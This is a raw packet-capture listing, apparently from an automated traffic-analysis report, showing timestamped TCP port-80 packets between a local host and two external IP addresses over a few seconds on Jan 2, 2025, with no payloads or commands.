                                                                            Jan 2, 2025 20:34:58.913644075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913650036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913661003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913664103 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913671017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913683891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913690090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913701057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913705111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913712025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913722992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913722992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913734913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913746119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913748026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913755894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913765907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913777113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913779974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913788080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913799047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913817883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913831949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913846016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913855076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913866043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913868904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913877010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913887024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913897038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913907051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913918018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913923025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913928986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913938046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913940907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913954020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913964033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913966894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913975000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913985968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.913992882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.913995981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914007902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914011955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914019108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914035082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914036036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914048910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914053917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914061069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914067030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914072037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914083004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914094925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914099932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914107084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914117098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914128065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914129019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914144993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914149046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914156914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914167881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914170980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914180040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914187908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914191008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914203882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914213896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914216042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.914243937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.914258957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.917413950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917478085 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.917529106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917541981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917560101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917572021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917584896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.917592049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917603016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917612076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.917613983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917624950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917637110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917646885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917654991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.917658091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917670012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917680025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.917686939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.917707920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.917726994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.918586016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918628931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.918804884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918831110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918842077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918852091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918853045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.918864965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918875933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918876886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.918886900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.918888092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918905973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918915987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918927908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918936968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.918937922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918948889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918956041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.918960094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918971062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918971062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.918982029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918992996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.918996096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.919003963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919004917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.919015884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919028044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919038057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919042110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.919049025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919055939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919066906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919070005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.919079065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919085026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.919089079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.919105053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.919146061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.920005083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.920046091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.920087099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.920099020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.920110941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.920120001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.920123100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.920131922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.920144081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.920154095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.920166016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.920197010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.924222946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.930278063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.930301905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.930311918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.930322886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.930327892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.930335999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.930346966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.930357933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.930358887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.930370092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.930397034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.930414915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.963948965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.963975906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.963990927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.964003086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.964003086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.964013100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.964029074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.964037895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.964049101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.964061022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.964078903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.964102030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.970746040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.970763922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.970777035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.970787048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.970791101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.970798016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.970810890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.970813990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.970822096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.970833063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.970854044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.970866919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.973833084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.973881006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.973898888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.973910093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.973927021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.973937988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.973947048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.973949909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.973958015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.973959923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.973998070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:59.028991938 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:34:59.033937931 CET804973869.42.215.252192.168.2.4
                                                                            Jan 2, 2025 20:34:59.034020901 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:34:59.034657955 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:34:59.039429903 CET804973869.42.215.252192.168.2.4
                                                                            Jan 2, 2025 20:34:59.430531025 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:59.435426950 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:59.435511112 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:59.435656071 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:59.440381050 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:59.702755928 CET804973869.42.215.252192.168.2.4
                                                                            Jan 2, 2025 20:34:59.703336954 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:34:59.869699001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.259752035 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.259772062 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.259784937 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.259799957 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.259871006 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.259871006 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.261188030 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.261217117 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.261229992 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.261241913 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.261241913 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.261265993 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.261265993 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.261338949 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.264590979 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.264604092 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.264672995 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.264775038 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.264800072 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.264935017 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.266376972 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.266388893 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.266400099 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.266954899 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.346560001 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.346582890 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.346595049 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.346606970 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.346618891 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.346642971 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.346976995 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.347791910 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.347811937 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.347822905 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.347903967 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.347903967 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.348048925 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.348061085 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.348073959 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.348097086 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.348097086 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.348187923 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.351301908 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.351325989 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.351339102 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.351361990 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.351385117 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.351396084 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.351406097 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.351409912 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.351422071 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.351429939 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.351443052 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.351533890 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.352264881 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.352277040 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.352288961 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.352336884 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.352336884 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.352930069 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.352941036 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.353041887 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.353053093 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.353064060 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.353065014 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.353077888 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.353099108 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.353099108 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.353190899 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.433170080 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433207989 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433217049 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433247089 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433258057 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433265924 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.433270931 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433283091 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433346033 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.433346033 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.433731079 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433763027 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433773041 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.433830023 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.433830023 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.433998108 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434006929 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434050083 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.434050083 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.434581041 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434592962 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434604883 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434614897 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434624910 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.434626102 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434647083 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.434804916 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.434860945 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434871912 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434887886 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434897900 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434909105 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.434911013 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.434953928 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.434953928 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.438170910 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438184023 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438201904 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438213110 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438278913 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.438278913 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.438333988 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438441992 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438447952 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.438452959 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438465118 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438474894 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438487053 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438487053 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.438503981 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438514948 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.438524008 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.438574076 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.439246893 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439264059 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439275026 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439285040 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439296007 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.439297915 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439341068 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.439351082 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:00.439893961 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439905882 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:00.439918995 CET804974047.254.187.72192.168.2.4
